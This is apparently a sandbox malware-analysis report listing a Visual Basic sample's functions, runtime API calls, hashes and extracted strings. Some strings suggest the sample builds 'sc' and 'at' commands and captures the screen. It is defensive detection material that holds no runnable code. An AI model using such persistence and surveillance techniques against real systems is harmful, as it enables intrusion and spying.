                                                                                    • __vbaGenerateBoundsError.MSVBVM60(00000000,660E56DE,660E6C30), ref: 00420E56
                                                                                    • __vbaGenerateBoundsError.MSVBVM60(00000000,660E56DE,660E6C30), ref: 00420E6A
                                                                                    • __vbaGenerateBoundsError.MSVBVM60(00000000,660E56DE,660E6C30), ref: 00420E85
                                                                                    • __vbaGenerateBoundsError.MSVBVM60(00000000,660E56DE,660E6C30), ref: 00420E99
                                                                                    • __vbaGenerateBoundsError.MSVBVM60(00000000,660E56DE,660E6C30), ref: 00420EAE
                                                                                    • __vbaGenerateBoundsError.MSVBVM60(00000000,660E56DE,660E6C30), ref: 00420EC2
                                                                                    • __vbaGenerateBoundsError.MSVBVM60(660E6C30), ref: 00420ED8
                                                                                    • __vbaI2I4.MSVBVM60(660E6C30), ref: 00420EDF
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.270471051.0000000000402000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000000.00000002.270464741.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.270468015.0000000000401000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.270634178.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.270646029.000000000042E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_400000_Lg3gn9y1Cj.jbxd
                                                                                    Similarity
                                                                                    • API ID: __vba$BoundsErrorGenerate
                                                                                    • String ID:
                                                                                    • API String ID: 3574812510-0
                                                                                    • Opcode ID: 531f9eca504aa198c6c6dfefc7d7df16526d6ddf688e9b54a0de9df055713b13
                                                                                    • Instruction ID: aa417d5a5a3cc9c21652b4fe2a9d25cfa30c058b0be9d244c1a14ba1329cb19f
                                                                                    • Opcode Fuzzy Hash: 531f9eca504aa198c6c6dfefc7d7df16526d6ddf688e9b54a0de9df055713b13
                                                                                    • Instruction Fuzzy Hash: 9E718935F1136586D724AB99E9C75ADB3E3BF88701FC11466C48123262DFB8A8C1C6DD
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Function 00426720 Relevance: 46.8, APIs: 31, Instructions: 331COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • __vbaOnError.MSVBVM60(00000001,00000000,660CC33A,6600A3D7), ref: 00426796
                                                                                    • __vbaSetSystemError.MSVBVM60(00000000,00000000,?,00000000), ref: 004267C7
                                                                                    • __vbaSetSystemError.MSVBVM60(?,?,00000040,?,00000000), ref: 004267DF
                                                                                    • __vbaSetSystemError.MSVBVM60(?,?,?,00000000,?,?,00000040,?,00000000), ref: 00426804
                                                                                    • __vbaSetSystemError.MSVBVM60(?,?,00000014,?,00000000,?,?,?,00000000,?,?,00000040,?,00000000), ref: 00426819
                                                                                    • __vbaSetSystemError.MSVBVM60(?,?,000000E0,?,00000000,?,?,00000014,?,00000000,?,?,?,00000000,?,?), ref: 00426834
                                                                                    • __vbaRedim.MSVBVM60(00000000,00000028,?,00000000,00000001,00000000,00000000,?,?,000000E0,?,00000000,?,?,00000014,?), ref: 00426853
                                                                                    • __vbaAryLock.MSVBVM60(?,?,?,00000000,?,?,00000040,?,00000000), ref: 00426867
                                                                                    • __vbaGenerateBoundsError.MSVBVM60(?,?,00000040,?,00000000), ref: 00426887
                                                                                    • __vbaGenerateBoundsError.MSVBVM60(?,?,00000040,?,00000000), ref: 004268A7
                                                                                    • __vbaSetSystemError.MSVBVM60(?,3F800000,?,?,00000000,?,?,00000040,?,00000000), ref: 004268D5
                                                                                    • __vbaAryUnlock.MSVBVM60(?,?,?,00000040,?,00000000), ref: 004268DE
                                                                                    • __vbaUbound.MSVBVM60(00000001,?,?,?,00000040,?,00000000), ref: 004268F8
                                                                                    • __vbaI2I4.MSVBVM60(?,?,00000040,?,00000000), ref: 00426900
                                                                                    • __vbaGenerateBoundsError.MSVBVM60(?,?,00000040,?,00000000), ref: 00426936
                                                                                    • __vbaGenerateBoundsError.MSVBVM60(?,?,00000040,?,00000000), ref: 00426946
                                                                                    • __vbaGenerateBoundsError.MSVBVM60(?,?,00000040,?,00000000), ref: 00426962
                                                                                    • __vbaGenerateBoundsError.MSVBVM60(?,?,00000040,?,00000000), ref: 00426972
                                                                                    • __vbaGenerateBoundsError.MSVBVM60(?,?,00000040,?,00000000), ref: 004269A5
                                                                                    • __vbaGenerateBoundsError.MSVBVM60(?,?,00000040,?,00000000), ref: 004269B5
                                                                                    • __vbaGenerateBoundsError.MSVBVM60(?,?,00000040,?,00000000), ref: 004269FD
                                                                                    • __vbaGenerateBoundsError.MSVBVM60(?,?,00000040,?,00000000), ref: 00426A0D
                                                                                    • __vbaGenerateBoundsError.MSVBVM60(?,?,00000040,?,00000000), ref: 00426A33
                                                                                    • __vbaGenerateBoundsError.MSVBVM60(?,?,00000040,?,00000000), ref: 00426A43
                                                                                    • __vbaGenerateBoundsError.MSVBVM60(?,?,00000040,?,00000000), ref: 00426A69
                                                                                    • __vbaGenerateBoundsError.MSVBVM60(?,?,00000040,?,00000000), ref: 00426A79
                                                                                    • __vbaGenerateBoundsError.MSVBVM60(?,?,00000040,?,00000000), ref: 00426A95
                                                                                    • __vbaGenerateBoundsError.MSVBVM60(?,?,00000040,?,00000000), ref: 00426AA2
                                                                                    • __vbaExitProc.MSVBVM60(?,?,00000040,?,00000000), ref: 00426ACD
                                                                                    • __vbaAryDestruct.MSVBVM60(00000000,?,00426AF5), ref: 00426AEE
                                                                                    • __vbaErrorOverflow.MSVBVM60(?,00000000,?,?,00000040,?,00000000), ref: 00426B0B
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.270471051.0000000000402000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000000.00000002.270464741.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.270468015.0000000000401000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.270634178.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.270646029.000000000042E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_400000_Lg3gn9y1Cj.jbxd
                                                                                    Similarity
                                                                                    • API ID: __vba$Error$BoundsGenerate$System$DestructExitLockOverflowProcRedimUboundUnlock
                                                                                    • String ID:
                                                                                    • API String ID: 2234381736-0
                                                                                    • Opcode ID: 8a3a9e375456d3784734aa077d45e81f9f694a82a56cb0dbdfd646f6f7379c76
                                                                                    • Instruction ID: 8bb1792076bedc514fb8fc9f35066fd02f5cb142c2b8cf4fa96dc0b38f9b19a4
                                                                                    • Opcode Fuzzy Hash: 8a3a9e375456d3784734aa077d45e81f9f694a82a56cb0dbdfd646f6f7379c76
                                                                                    • Instruction Fuzzy Hash: 6FC17F71E001299BCF14DFA8D980AEEBBB5FF48304FA1819AD405B7240D775AD82CFA5
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Function 0041F5C0 Relevance: 45.7, APIs: 25, Strings: 1, Instructions: 158COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • __vbaChkstk.MSVBVM60(00000000,Function_000032B6,?,?,?,?,0040B976,00000000), ref: 0041F5DE
                                                                                    • __vbaStrCopy.MSVBVM60(?,?,?,00000000,Function_000032B6), ref: 0041F60B
                                                                                    • __vbaFixstrConstruct.MSVBVM60(00000100,?,?,?,?,00000000,Function_000032B6), ref: 0041F61A
                                                                                    • __vbaOnError.MSVBVM60(000000FF,?,?,?,00000000,Function_000032B6), ref: 0041F629
                                                                                    • __vbaStrToAnsi.MSVBVM60(00000001,Microsoft Internet Explorer,00000001,00000000,00000000,00000000,?,?,?,00000000,Function_000032B6), ref: 0041F647
                                                                                    • __vbaSetSystemError.MSVBVM60(00000000,?,?,?,00000000,Function_000032B6), ref: 0041F656
                                                                                    • __vbaFreeStr.MSVBVM60(?,?,?,00000000,Function_000032B6), ref: 0041F665
                                                                                    • __vbaStrToAnsi.MSVBVM60(?,?,00000000,00000000,80000000,00000000), ref: 0041F696
                                                                                    • __vbaSetSystemError.MSVBVM60(00000000,00000000), ref: 0041F6A9
                                                                                    • __vbaStrToUnicode.MSVBVM60(?,?), ref: 0041F6B7
                                                                                    • __vbaFreeStr.MSVBVM60 ref: 0041F6C6
                                                                                    • __vbaStrToAnsi.MSVBVM60(?,?,00000100,?), ref: 0041F6F5
                                                                                    • __vbaSetSystemError.MSVBVM60(00000000,00000000), ref: 0041F705
                                                                                    • __vbaStrToUnicode.MSVBVM60(?,?), ref: 0041F713
                                                                                    • __vbaLsetFixstr.MSVBVM60(00000000,?,00000000), ref: 0041F720
                                                                                    • __vbaFreeStrList.MSVBVM60(00000002,?,?), ref: 0041F730
                                                                                    • __vbaStrToAnsi.MSVBVM60(?,?,00000100,00000000), ref: 0041F75E
                                                                                    • __vbaSetSystemError.MSVBVM60(00000000,00000000), ref: 0041F76E
                                                                                    • __vbaStrToUnicode.MSVBVM60(?,?), ref: 0041F77C
                                                                                    • __vbaLsetFixstr.MSVBVM60(00000000,?,00000000), ref: 0041F789
                                                                                    • __vbaFreeStrList.MSVBVM60(00000002,?,?), ref: 0041F799
                                                                                    • __vbaSetSystemError.MSVBVM60(00000000), ref: 0041F7B4
                                                                                    • __vbaSetSystemError.MSVBVM60(00000000), ref: 0041F7CA
                                                                                    • __vbaFreeStr.MSVBVM60(0041F811), ref: 0041F801
                                                                                    • __vbaFreeStr.MSVBVM60 ref: 0041F80A
                                                                                    Strings
                                                                                    • Microsoft Internet Explorer, xrefs: 0041F63E
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.270471051.0000000000402000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000000.00000002.270464741.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.270468015.0000000000401000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.270634178.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.270646029.000000000042E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_400000_Lg3gn9y1Cj.jbxd
                                                                                    Similarity
                                                                                    • API ID: __vba$Error$FreeSystem$Ansi$FixstrUnicode$ListLset$ChkstkConstructCopy
                                                                                    • String ID: Microsoft Internet Explorer
                                                                                    • API String ID: 4206449948-3125735337
                                                                                    • Opcode ID: cded7575dc80e55b3969bd68fd6dc42ddc0613399f5cdd5ea9fa15ec02432952
                                                                                    • Instruction ID: b2079e6668a1cd7a86d62b88bf03b67035dbb3734d396ffb12c1851edfe9c710
                                                                                    • Opcode Fuzzy Hash: cded7575dc80e55b3969bd68fd6dc42ddc0613399f5cdd5ea9fa15ec02432952
                                                                                    • Instruction Fuzzy Hash: 4561CB75900208EFDB04EFE4EE49FDEBB78AB48705F104169F611B61A0CB746A45CB65
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Function 00429340 Relevance: 40.4, APIs: 21, Strings: 2, Instructions: 146COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • __vbaChkstk.MSVBVM60(?,Function_000032B6), ref: 0042935E
                                                                                    • __vbaOnError.MSVBVM60(000000FF,?,?,?,?,Function_000032B6), ref: 004293A3
                                                                                    • __vbaStrCopy.MSVBVM60(?,?,?,?,Function_000032B6), ref: 004293B8
                                                                                    • #712.MSVBVM60(?,file:///,00408114,00000001,000000FF,00000000,?,?,?,?,Function_000032B6), ref: 004293D9
                                                                                    • __vbaStrMove.MSVBVM60(?,?,?,?,Function_000032B6), ref: 004293E4
                                                                                    • #712.MSVBVM60(?,00409840,00406544,00000001,000000FF,00000000,?,?,?,?,Function_000032B6), ref: 00429405
                                                                                    • __vbaStrMove.MSVBVM60(?,?,?,?,Function_000032B6), ref: 00429410
                                                                                    • #572.MSVBVM60(00004002), ref: 00429469
                                                                                    • __vbaStrMove.MSVBVM60 ref: 00429474
                                                                                    • #537.MSVBVM60(00000020), ref: 0042947F
                                                                                    • __vbaStrMove.MSVBVM60 ref: 0042948A
                                                                                    • __vbaStrMove.MSVBVM60(00000001,000000FF,00000001), ref: 004294B6
                                                                                    • __vbaStrMove.MSVBVM60(004097E0,00000000), ref: 004294C8
                                                                                    • __vbaStrCat.MSVBVM60(00000000), ref: 004294CF
                                                                                    • __vbaStrMove.MSVBVM60 ref: 004294DA
                                                                                    • #712.MSVBVM60(?,00000000), ref: 004294E5
                                                                                    • __vbaStrMove.MSVBVM60 ref: 004294F0
                                                                                    • __vbaFreeStrList.MSVBVM60(00000005,?,?,?,00000000,00000000), ref: 0042950C
                                                                                    • __vbaStrCopy.MSVBVM60 ref: 0042952E
                                                                                    • __vbaFreeStr.MSVBVM60(00429578), ref: 00429571
                                                                                    • __vbaErrorOverflow.MSVBVM60 ref: 004295A2
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.270471051.0000000000402000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000000.00000002.270464741.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.270468015.0000000000401000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.270634178.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.270646029.000000000042E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_400000_Lg3gn9y1Cj.jbxd
                                                                                    Similarity
                                                                                    • API ID: __vba$Move$#712$CopyErrorFree$#537#572ChkstkListOverflow
                                                                                    • String ID: $file:///
                                                                                    • API String ID: 1913684286-1087255347
                                                                                    • Opcode ID: 10574e520546cbbb49ac820470f987c6e6ae451a19177e6353396db4924bff4d
                                                                                    • Instruction ID: b77d49a70da6056938b5249be74374e1b73de407e439ef27e1b36e2e5139af87
                                                                                    • Opcode Fuzzy Hash: 10574e520546cbbb49ac820470f987c6e6ae451a19177e6353396db4924bff4d
                                                                                    • Instruction Fuzzy Hash: 6E510875E00209EBCB04DFA4DE48BDEBBB5FF08705F208269E512B72A0DB755A45CB58
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Function 0041EC69 Relevance: 40.4, APIs: 22, Strings: 1, Instructions: 118COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • __vbaSetSystemError.MSVBVM60(?,?,00000020), ref: 0041ECA0
                                                                                      • Part of subcall function 0041F150: __vbaChkstk.MSVBVM60(00000000,Function_000032B6), ref: 0041F16E
                                                                                      • Part of subcall function 0041F150: __vbaOnError.MSVBVM60(000000FF,?,?,?,00000000,Function_000032B6), ref: 0041F19E
                                                                                      • Part of subcall function 0041F150: #537.MSVBVM60(00000000,?,?,?,00000000,Function_000032B6), ref: 0041F1AD
                                                                                      • Part of subcall function 0041F150: #606.MSVBVM60(000000FF,00000008), ref: 0041F1C6
                                                                                      • Part of subcall function 0041F150: __vbaStrMove.MSVBVM60 ref: 0041F1D1
                                                                                      • Part of subcall function 0041F150: __vbaFreeVar.MSVBVM60 ref: 0041F1DA
                                                                                      • Part of subcall function 0041F150: __vbaStrToAnsi.MSVBVM60(?,?), ref: 0041F1F5
                                                                                      • Part of subcall function 0041F150: __vbaSetSystemError.MSVBVM60(00000000), ref: 0041F201
                                                                                      • Part of subcall function 0041F150: __vbaStrToUnicode.MSVBVM60(?,?), ref: 0041F20F
                                                                                      • Part of subcall function 0041F150: __vbaFreeStr.MSVBVM60 ref: 0041F218
                                                                                      • Part of subcall function 0041F150: #537.MSVBVM60(00000000,?,00000001), ref: 0041F22D
                                                                                      • Part of subcall function 0041F150: __vbaStrMove.MSVBVM60 ref: 0041F238
                                                                                      • Part of subcall function 0041F150: __vbaInStr.MSVBVM60(00000000,00000000), ref: 0041F241
                                                                                      • Part of subcall function 0041F150: #616.MSVBVM60(?,-00000001), ref: 0041F251
                                                                                      • Part of subcall function 0041F150: __vbaStrMove.MSVBVM60 ref: 0041F25C
                                                                                      • Part of subcall function 0041F150: __vbaFreeStr.MSVBVM60 ref: 0041F265
                                                                                      • Part of subcall function 0041F150: __vbaFreeStr.MSVBVM60(0041F2A2), ref: 0041F29B
                                                                                    • __vbaStrMove.MSVBVM60(?), ref: 0041ECBB
                                                                                    • __vbaStrCmp.MSVBVM60(00408114,?), ref: 0041ECD1
                                                                                    • __vbaStrCat.MSVBVM60(00000000,00409A70,?), ref: 0041ECF1
                                                                                    • __vbaStrMove.MSVBVM60 ref: 0041ECFC
                                                                                    • __vbaStrCmp.MSVBVM60(00000000), ref: 0041ED03
                                                                                    • __vbaFreeStr.MSVBVM60 ref: 0041ED1E
                                                                                    • __vbaStrCat.MSVBVM60(?,sc ), ref: 0041ED43
                                                                                    • __vbaStrMove.MSVBVM60 ref: 0041ED4E
                                                                                    • __vbaStrCat.MSVBVM60(00000000,00000000), ref: 0041ED5C
                                                                                    • #600.MSVBVM60(00000008,00000000), ref: 0041ED7B
                                                                                    • __vbaFreeStr.MSVBVM60 ref: 0041ED8A
                                                                                    • __vbaFreeVar.MSVBVM60 ref: 0041ED96
                                                                                    • __vbaStrCat.MSVBVM60(?,sc ), ref: 0041EDAC
                                                                                    • __vbaStrMove.MSVBVM60 ref: 0041EDB7
                                                                                    • __vbaStrCat.MSVBVM60(00000000,00000000), ref: 0041EDC5
                                                                                    • #600.MSVBVM60(00000008,00000000), ref: 0041EDE4
                                                                                    • __vbaFreeStr.MSVBVM60 ref: 0041EDF3
                                                                                    • __vbaFreeVar.MSVBVM60 ref: 0041EDFF
                                                                                      • Part of subcall function 0041A980: __vbaChkstk.MSVBVM60(00000000,Function_000032B6), ref: 0041A99E
                                                                                      • Part of subcall function 0041A980: __vbaStrCopy.MSVBVM60(?,00000000,?,00000000,Function_000032B6), ref: 0041A9CE
                                                                                      • Part of subcall function 0041A980: __vbaAryConstruct2.MSVBVM60(?,00408078,00000003,?,00000000,?,00000000,Function_000032B6), ref: 0041A9DF
                                                                                      • Part of subcall function 0041A980: __vbaOnError.MSVBVM60(000000FF,?,00000000,?,00000000,Function_000032B6), ref: 0041A9EE
                                                                                      • Part of subcall function 0041A980: __vbaSetSystemError.MSVBVM60(0000000F,00000000,?,00000000,?,00000000,Function_000032B6), ref: 0041AA0A
                                                                                      • Part of subcall function 0041A980: __vbaRecUniToAnsi.MSVBVM60(00405598,?,00000128), ref: 0041AA44
                                                                                      • Part of subcall function 0041A980: __vbaSetSystemError.MSVBVM60(?,00000000), ref: 0041AA5A
                                                                                      • Part of subcall function 0041A980: __vbaRecAnsiToUni.MSVBVM60(00405598,00000128,?), ref: 0041AA73
                                                                                      • Part of subcall function 0041A980: #525.MSVBVM60(00000104), ref: 0041AA9C
                                                                                      • Part of subcall function 0041A980: __vbaStrMove.MSVBVM60 ref: 0041AAA7
                                                                                      • Part of subcall function 0041A980: __vbaSetSystemError.MSVBVM60(00000410,00000000,?), ref: 0041AADE
                                                                                      • Part of subcall function 0041A980: __vbaStrToAnsi.MSVBVM60(?,00000000,000001F4), ref: 0041AB38
                                                                                    • __vbaSetSystemError.MSVBVM60(00000014,00000000), ref: 0041EE2B
                                                                                    • #598.MSVBVM60 ref: 0041EE38
                                                                                    • #611.MSVBVM60(00000000), ref: 0041EE47
                                                                                    • #661.MSVBVM60(?,00407C78,00000000,40000000,00000008), ref: 0041EE77
                                                                                    • #705.MSVBVM60(?,00000004), ref: 0041EE86
                                                                                    • __vbaStrMove.MSVBVM60 ref: 0041EE94
                                                                                    • __vbaStrCat.MSVBVM60(?,at ), ref: 0041EEB9
                                                                                    • __vbaStrMove.MSVBVM60 ref: 0041EEC4
                                                                                    • __vbaStrCat.MSVBVM60(004086A8,00000000), ref: 0041EED0
                                                                                    • __vbaStrMove.MSVBVM60 ref: 0041EEDB
                                                                                    • __vbaStrMove.MSVBVM60(00000000), ref: 0041EEEB
                                                                                    • __vbaStrCat.MSVBVM60(00000000), ref: 0041EEF2
                                                                                    • __vbaStrMove.MSVBVM60 ref: 0041EEFD
                                                                                    • __vbaStrCat.MSVBVM60(00000000,00000000), ref: 0041EF0A
                                                                                    • __vbaStrMove.MSVBVM60 ref: 0041EF15
                                                                                    • __vbaStrCat.MSVBVM60("\\,00000000), ref: 0041EF21
                                                                                    • __vbaStrMove.MSVBVM60 ref: 0041EF2C
                                                                                    • __vbaStrCat.MSVBVM60(00000000,00000000), ref: 0041EF3A
                                                                                    • __vbaStrMove.MSVBVM60 ref: 0041EF45
                                                                                    • __vbaStrCat.MSVBVM60(00406544,00000000), ref: 0041EF51
                                                                                    • __vbaStrMove.MSVBVM60 ref: 0041EF5C
                                                                                    • __vbaStrCat.MSVBVM60(00000000,00000000), ref: 0041EF6A
                                                                                    • __vbaStrMove.MSVBVM60 ref: 0041EF78
                                                                                    • __vbaStrCat.MSVBVM60(00406544,00000000), ref: 0041EF84
                                                                                    • __vbaStrMove.MSVBVM60 ref: 0041EF92
                                                                                    • __vbaStrCat.MSVBVM60(00000000,00000000), ref: 0041EF9F
                                                                                    • __vbaStrMove.MSVBVM60 ref: 0041EFAD
                                                                                    • __vbaStrCat.MSVBVM60(004095E4,00000000), ref: 0041EFB9
                                                                                    • #600.MSVBVM60(00000008,00000000), ref: 0041EFD8
                                                                                    • __vbaOnError.MSVBVM60(000000FF), ref: 0041F076
                                                                                    • __vbaSetSystemError.MSVBVM60(00000000), ref: 0041F099
                                                                                    • __vbaSetSystemError.MSVBVM60(?), ref: 0041F0AF
                                                                                    • __vbaExitProc.MSVBVM60 ref: 0041F0B5
                                                                                    • __vbaFreeStr.MSVBVM60(0041F135), ref: 0041F12E
                                                                                    • __vbaErrorOverflow.MSVBVM60 ref: 0041F146
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.270471051.0000000000402000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000000.00000002.270464741.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.270468015.0000000000401000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.270634178.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.270646029.000000000042E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_400000_Lg3gn9y1Cj.jbxd
                                                                                    Similarity
                                                                                    • API ID: __vba$Move$Error$Free$System$Ansi$#600$#537Chkstk$#525#598#606#611#616#661#705Construct2CopyExitOverflowProcUnicode
                                                                                    • String ID: sc
                                                                                    • API String ID: 4194055773-3695712183
                                                                                    • Opcode ID: 10bc9b33671cf09b2be45f840a71d39027787730a0e625a90ceabfc0ea0b6571
                                                                                    • Instruction ID: 1563775ad5923100dd4d9da9d865aeb77b3bef46a6a949fae2e94889091cf12a
                                                                                    • Opcode Fuzzy Hash: 10bc9b33671cf09b2be45f840a71d39027787730a0e625a90ceabfc0ea0b6571
                                                                                    • Instruction Fuzzy Hash: 44510875A00219DBDB24EFA0DE49BDD7BB4BB44301F1081A9E14AF72A1DB385E85CF18
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Function 0040D123 Relevance: 39.4, APIs: 26, Instructions: 364COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • __vbaObjSet.MSVBVM60(?,00000000), ref: 0040D164
                                                                                    • __vbaHresultCheckObj.MSVBVM60(00000000,00000000,004082BC,0000004C), ref: 0040D197
                                                                                    • __vbaFreeObj.MSVBVM60 ref: 0040D1CF
                                                                                    • __vbaHresultCheckObj.MSVBVM60(00000000,?,00406330,00000728), ref: 0040D22E
                                                                                    • __vbaChkstk.MSVBVM60(?), ref: 0040D264
                                                                                    • __vbaHresultCheckObj.MSVBVM60(00000000,00000000,004077C4,00000020), ref: 0040D2A8
                                                                                    • __vbaObjSet.MSVBVM60(?,?), ref: 0040D2DB
                                                                                    • __vbaErrorOverflow.MSVBVM60 ref: 0040D522
                                                                                    • __vbaOnError.MSVBVM60(00000001), ref: 0040D56C
                                                                                    • __vbaNew2.MSVBVM60(00406520,0042CC34), ref: 0040D584
                                                                                    • __vbaObjSet.MSVBVM60(?,00000000), ref: 0040D5A7
                                                                                    • __vbaHresultCheckObj.MSVBVM60(00000000,00000000,004082BC,00000040), ref: 0040D5CB
                                                                                    • __vbaObjSet.MSVBVM60(?,?), ref: 0040D5E2
                                                                                    • __vbaHresultCheckObj.MSVBVM60(00000000,00000000,00406510,0000000C), ref: 0040D5F8
                                                                                    • __vbaFreeObjList.MSVBVM60(00000002,?,?), ref: 0040D608
                                                                                    • __vbaExitProc.MSVBVM60 ref: 0040D611
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.270471051.0000000000402000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000000.00000002.270464741.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.270468015.0000000000401000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.270634178.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.270646029.000000000042E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_400000_Lg3gn9y1Cj.jbxd
                                                                                    Similarity
                                                                                    • API ID: __vba$CheckHresult$ErrorFree$ChkstkExitListNew2OverflowProc
                                                                                    • String ID:
                                                                                    • API String ID: 435708370-0
                                                                                    • Opcode ID: 9749cd1c4f2270137a3b9f12548bda0f3a75b9f7e342ec696e87967a4431a42f
                                                                                    • Instruction ID: fcce0bd25021f4c55c21d17dcae381c1af859cd8f25d7f86317db57e57613949
                                                                                    • Opcode Fuzzy Hash: 9749cd1c4f2270137a3b9f12548bda0f3a75b9f7e342ec696e87967a4431a42f
                                                                                    • Instruction Fuzzy Hash: CEE11774D00208EFDB14DFA4D988ADEBBB5FF48700F20816AE509BB291D7759985CFA4
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Function 00418D00 Relevance: 37.0, APIs: 20, Strings: 1, Instructions: 221COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • __vbaChkstk.MSVBVM60(?,Function_000032B6,?,?,?,660E6A76,660E6C30,?), ref: 00418D1E
                                                                                    • __vbaOnError.MSVBVM60(000000FF,00000000,?,?,?,Function_000032B6,?), ref: 00418D4E
                                                                                    • __vbaRecUniToAnsi.MSVBVM60(004054A0,?,?), ref: 00418D6E
                                                                                    • __vbaStrI4.MSVBVM60(00000000,00000000), ref: 00418D77
                                                                                    • __vbaStrMove.MSVBVM60 ref: 00418D85
                                                                                    • __vbaStrToAnsi.MSVBVM60(?,00000000), ref: 00418D93
                                                                                    • __vbaStrI4.MSVBVM60(00000000,00000000), ref: 00418D9C
                                                                                    • __vbaStrMove.MSVBVM60 ref: 00418DAA
                                                                                    • __vbaStrToAnsi.MSVBVM60(?,00000000), ref: 00418DB8
                                                                                    • __vbaStrToAnsi.MSVBVM60(?,DISPLAY,00000000), ref: 00418DCB
                                                                                    • __vbaSetSystemError.MSVBVM60(00000000), ref: 00418DDD
                                                                                    • __vbaRecAnsiToUni.MSVBVM60(004054A0,?,?), ref: 00418DF6
                                                                                    • __vbaFreeStrList.MSVBVM60(00000005,?,?,?,?,?), ref: 00418E2D
                                                                                    • __vbaHresultCheckObj.MSVBVM60(00000000,?,004098D4,00000084), ref: 00418EAD
                                                                                    • __vbaHresultCheckObj.MSVBVM60(00000000,?,004098D4,0000008C), ref: 00418F3C
                                                                                    • __vbaHresultCheckObj.MSVBVM60(00000000,?,004098D4,00000278), ref: 00418FA4
                                                                                    • __vbaHresultCheckObj.MSVBVM60(00000000,?,004098D4,000000E0), ref: 00419013
                                                                                    • __vbaSetSystemError.MSVBVM60(?,00000000,00000000,?,?,?,?,?,00CC0020), ref: 0041905F
                                                                                    • __vbaSetSystemError.MSVBVM60(?,?,00CC0020), ref: 00419078
                                                                                    • __vbaErrorOverflow.MSVBVM60 ref: 004190C9
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.270471051.0000000000402000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000000.00000002.270464741.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.270468015.0000000000401000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.270634178.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.270646029.000000000042E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_400000_Lg3gn9y1Cj.jbxd
                                                                                    Similarity
